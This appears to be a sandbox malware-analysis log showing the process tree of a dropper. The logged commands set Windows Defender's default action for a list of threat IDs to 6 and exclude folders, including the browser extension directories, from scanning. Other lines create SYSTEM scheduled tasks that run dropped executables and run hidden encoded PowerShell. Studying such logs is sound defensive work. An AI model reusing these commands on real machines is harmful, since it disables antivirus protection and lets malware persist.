[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious use of AdjustPrivilegeToken
PID:4444

[2] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
PID:6024

[2] C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
PID:5860

[1] C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam
PID:4380

[1] C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam
PID:5528

[1] C:\Windows\windefender.exe | C:\Windows\windefender.exe
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4432
[1] C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe id /Jysite_idmve 385118 /S
- Executes dropped EXE
- Drops file in System32 directory
PID:2452

[2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3808

[3] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID:5856

[4] C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID:5528

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
PID:4380

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
PID:5628

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
PID:5212

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
PID:3148

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
PID:5244

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
PID:1832

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
PID:5900

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
PID:5880

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
PID:5616

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
PID:4128

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
PID:4372

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
PID:3068

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
PID:2376

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
PID:4436

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
PID:3584

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
PID:5320

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
PID:3092

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
PID:5648

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
PID:5808

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
PID:5076

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
PID:5824

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
PID:2364

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
PID:3380

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
PID:2108

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
PID:5168

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
PID:5520

[3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
PID:2880
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
Level 3: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
  PID:2044

Level 4: C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
  PID:5756

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
  PID:5288

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
  PID:5360

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
  PID:5392

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
  PID:3192

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
  PID:4540

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
  PID:440

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
  PID:5744

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
  PID:4472

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
  PID:3952

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
  PID:5980

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
  PID:2924

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
  PID:1908

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
  PID:4660

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
  PID:3228

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
  PID:5220

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
  PID:5780

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
  PID:2344

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
  PID:1800

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
  PID:1872
Level 2: C:\Windows\SysWOW64\sch
tasks.exe
  Command line: schtasks /CREATE /TN "gXmMMWGSr" /SC once /ST 00:54:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (the -EncodedCommand payload is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)
  PID:3176

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "gXmMMWGSr"
  PID:5500

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "gXmMMWGSr"
  PID:5864

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 00:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe\" Ty /zHsite_idTXl 385118 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5544

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
  PID:6004

Level 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (same payload as the "gXmMMWGSr" task above; decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, which the gpupdate.exe child below confirms)
  - Suspicious use of AdjustPrivilegeToken
  PID:516

Level 2: C:\Windows\system32\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force
  PID:5036

Level 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID:1848

Level 1: C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID:3572
Level 1: C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe
  Command line: C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe Ty /zHsite_idTXl 385118 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:6056

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
  PID:4264

Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  PID:3528

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  PID:2096

Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  PID:4204

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  PID:5808

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5932

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
  PID:5232

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /END /TN "eGwAoTnpAObQfPU"
  PID:6040

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
  PID:4204

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
  PID:6068

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\KXGcMEN.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
  PID:5440

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
  PID:4444

